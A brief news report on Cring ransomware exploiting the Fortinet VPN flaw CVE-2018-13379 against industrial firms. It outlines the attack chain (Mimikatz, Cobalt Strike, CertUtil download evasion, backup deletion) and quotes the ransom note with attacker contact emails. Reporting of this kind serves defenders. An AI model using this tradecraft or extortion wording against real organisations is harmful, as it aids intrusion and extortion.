TeamHood Cring Ransomware is exploiting Fortinet vulnerability to breach and encrypt industrial sector companies’ networks.
The Cring operators drop customized Mimikatz samples, followed by CobaltStrike after gaining initial access and deploy the ransomware payloads by downloading using the legitimate Windows CertUtil certificate manager to bypass security software.
Kaspersky Threat Hunting team did a detailed research and found that the attackers exploit Internet-exposed Fortigate SSL VPN servers unpatched against the CVE-2018-13379 vulnerability, which allows them to breach their targets’ network.
“Victims of these attacks include industrial enterprises in European countries,” Kaspersky researchers said.
“At least in one case, an attack of the ransomware resulted in a temporary shutdown of the industrial process due to servers used to control the industrial process becoming encrypted.”
Attack Scenario
Cring operators move laterally on the enterprise network stealing Windows user credentials using Mimikatz to gain control of the domain administrator account.
The ransomware payloads are then delivered to devices on the victims’ networks using the Cobalt Strike threat emulation framework deployed using a malicious PowerShell script.
The ransomware encrypts only specific files on the compromised devices using strong encryption algorithms (RSA-8192 + AES-128) after removing backup files and killing Microsoft Office and Oracle Database processes.
It then drops ransom notes named !!!!!readme.rtf and deReadMe!!!.txt warning the victims that their network was encrypted and that they need to hurry to pay the ransom because the decryption key will not be kept indefinitely.
Ransom Note
Sorry, your network is encrypted, and most files are encrypted using special technology. The file cannot be recovered by any security company. If you do not believe that you can even consult a security company, your answer will be that you need to pay the corresponding fees, but we have a good reputation. After receiving the corresponding fee, we will immediately send the decryption program and KEY. You can contact us to get two file decryption services, and then you will get all decryption services after paying our fee, usually the cost is about 2 bitcoins.
Contact: eternalnightmare@tutanota.com qkhooks0708@protonmail.comVictims have been using the ID-Ransomware service to check if their systems were hit by Cring ransomware since the operation first surfaced in December 2020.
Indicators of compromise (IOCs), including malware sample hashes, C2 server IP addresses, and malware-hosting server addresses, are available at the end of Kaspersky’s report.
